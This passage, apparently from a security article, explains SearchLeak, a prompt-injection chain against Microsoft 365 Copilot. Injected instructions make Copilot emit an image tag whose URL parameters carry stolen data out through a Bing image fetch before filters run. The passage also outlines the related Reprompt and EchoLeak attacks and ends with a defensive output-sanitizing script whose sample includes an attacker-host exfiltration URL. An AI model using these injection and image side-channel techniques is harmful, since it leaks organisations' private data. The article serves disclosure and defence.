Copilot rendered its search results in the browser, and its output was not thoroughly sanitized. The attacker’s injected prompt caused Copilot to generate a response containing an HTML <img> tag whose src attribute pointed to an attacker‑controlled URL. A race condition in the rendering pipeline meant the browser fetched and loaded the image—sending the stolen data encoded in the image request—before Copilot’s security filters could inspect and block the output. In effect, the data leaked in the instant between the AI generating its response and the safety guardrail checking it.
The final exfiltration hop used a server‑side request forgery (SSRF) against Microsoft’s own Bing image search endpoint. The img tag’s source was crafted so the browser made a request to bing.com, a trusted internal Microsoft domain. Because the request appeared to originate from Bing’s infrastructure, it passed through enterprise network egress controls and data‑loss prevention (DLP) monitors undetected. The sensitive data was encoded in the URL parameters of that seemingly benign image fetch and routed straight to the attacker’s server.
Once triggered, Copilot worked with the permissions of the authenticated victim. The researchers demonstrated they could steal:
Any data that Copilot Enterprise Search could surface through the user’s Microsoft Graph permissions—which in most organisations is extensive—was potentially exfiltrated.
The NVD described the root cause as “improper neutralization of special elements used in a command (‘command injection’) in M365 Copilot”. Severity scores varied:
The practical risk was high because every Microsoft 365 Copilot Enterprise user was a potential target, the attack required only a single click on what appeared to be a fully trusted URL, and traditional email and network security tools were blind to it. Microsoft confirmed the vulnerability had been remediated server‑side and reported no evidence of in‑the‑wild exploitation at the time of disclosure.
SearchLeak is the third major prompt‑injection exploit against Microsoft Copilot discovered in roughly a year. The sequence reveals a structural weakness, not isolated bugs.
The same Varonis Threat Labs team disclosed Reprompt, an attack on Copilot Personal (the consumer edition). It also used the q URL parameter to inject instructions, but layered on a “double‑request” technique: Copilot’s leak protections only applied to the first interaction, so a retry could extract profile attributes, file summaries, and conversational memory. Microsoft fixed Reprompt in the January 2026 Patch Tuesday.
Discovered by Aim Security, EchoLeak was a zero‑click exploit in M365 Copilot. A single email containing hidden markdown image tags could exfiltrate data when Copilot processed the message—no user click needed at all. The attack demonstrated that even passive AI processing of trusted content could be weaponized.
SearchLeak, the Enterprise variant, combined P2P injection with web‑layer bugs to create a one‑click chain that exploited Bing’s own infrastructure as the exfiltration conduit, bypassing DLP entirely.
The common thread: all three attacks exploit the same fundamental architecture. LLM‑based assistants like Copilot trust user‑supplied content—URL parameters, email bodies, search queries—as legitimate instructions. When they produce output, that output often triggers automatic client‑side behaviour in browsers or mail clients (image loads, link renders, automatic fetches), creating a reliable side‑channel for data to leave the organisation. Microsoft has patched each vulnerability individually, but the recurring pattern suggests that prompt injection plus output side‑channels will keep surfacing until the architecture itself addresses where assistants draw the line between instruction and untrusted data.
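As an added illustration (not code from Varonis, Aim Security or Microsoft), here is a client‑side output filter that applies the defensive lesson of the three attacks: assistant output is sanitized synchronously before anything is handed to the renderer, so there is no race window; images are limited to an allowlisted host; and any image URL carrying a query string or fragment is dropped even on a trusted host, since the URL parameters are where the data rode out in the Bing fetch. The allowlisted host name and the sample response are constructed for the example.

```javascript
// Added example: defensive filter that must run BEFORE assistant output
// reaches the browser's renderer. Host names and sample text are constructed.

const ALLOWED_IMAGE_HOSTS = new Set(["static.example-corp.internal"]); // hypothetical allowlist

// Matches HTML <img ... src="..."> and Markdown ![alt](url) image syntax.
const HTML_IMG = /<img\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)[^>]*>/gi;
const MD_IMG = /!\[[^\]]*\]\(([^)\s]+)[^)]*\)/g;

// Decide whether one image URL may be fetched by the client. Rejects
// unparsable URLs, non-https schemes, hosts off the allowlist, and ANY query
// string or fragment: a trusted host alone does not stop data from riding
// along in the parameters of the image request.
function imageUrlAllowed(raw) {
  let url;
  try { url = new URL(raw); } catch { return false; }
  if (url.protocol !== "https:") return false;
  if (!ALLOWED_IMAGE_HOSTS.has(url.hostname)) return false;
  if (url.search !== "" || url.hash !== "") return false;
  return true;
}

// Replace every image reference that fails the policy and report what was
// removed, so the event can be logged and alerted on by the SOC.
function sanitizeAssistantOutput(text) {
  const blocked = [];
  const replaceIfBlocked = (match, src) => {
    if (imageUrlAllowed(src)) return match;
    blocked.push(src);
    return "[image removed by policy]";
  };
  const cleaned = text.replace(HTML_IMG, replaceIfBlocked).replace(MD_IMG, replaceIfBlocked);
  return { cleaned, blocked };
}

// Constructed sample: one legitimate image, one on a "trusted" host whose
// query string carries data, and one Markdown image on an outside host.
const SAMPLE_RESPONSE = [
  "Here is the chart you asked for:",
  '<img src="https://static.example-corp.internal/chart.png">',
  '<img src="https://trusted.example/th?q=constructed-data">',
  "![summary](https://attacker.invalid/i.png?d=constructed-data)",
].join("\n");

const result = sanitizeAssistantOutput(SAMPLE_RESPONSE);
console.log(result.cleaned);
console.log("blocked:", result.blocked);
```

The filter is intentionally strict: a real deployment would combine it with a Content Security Policy `img-src` directive so that the browser itself refuses non‑allowlisted image loads even if a filter is bypassed.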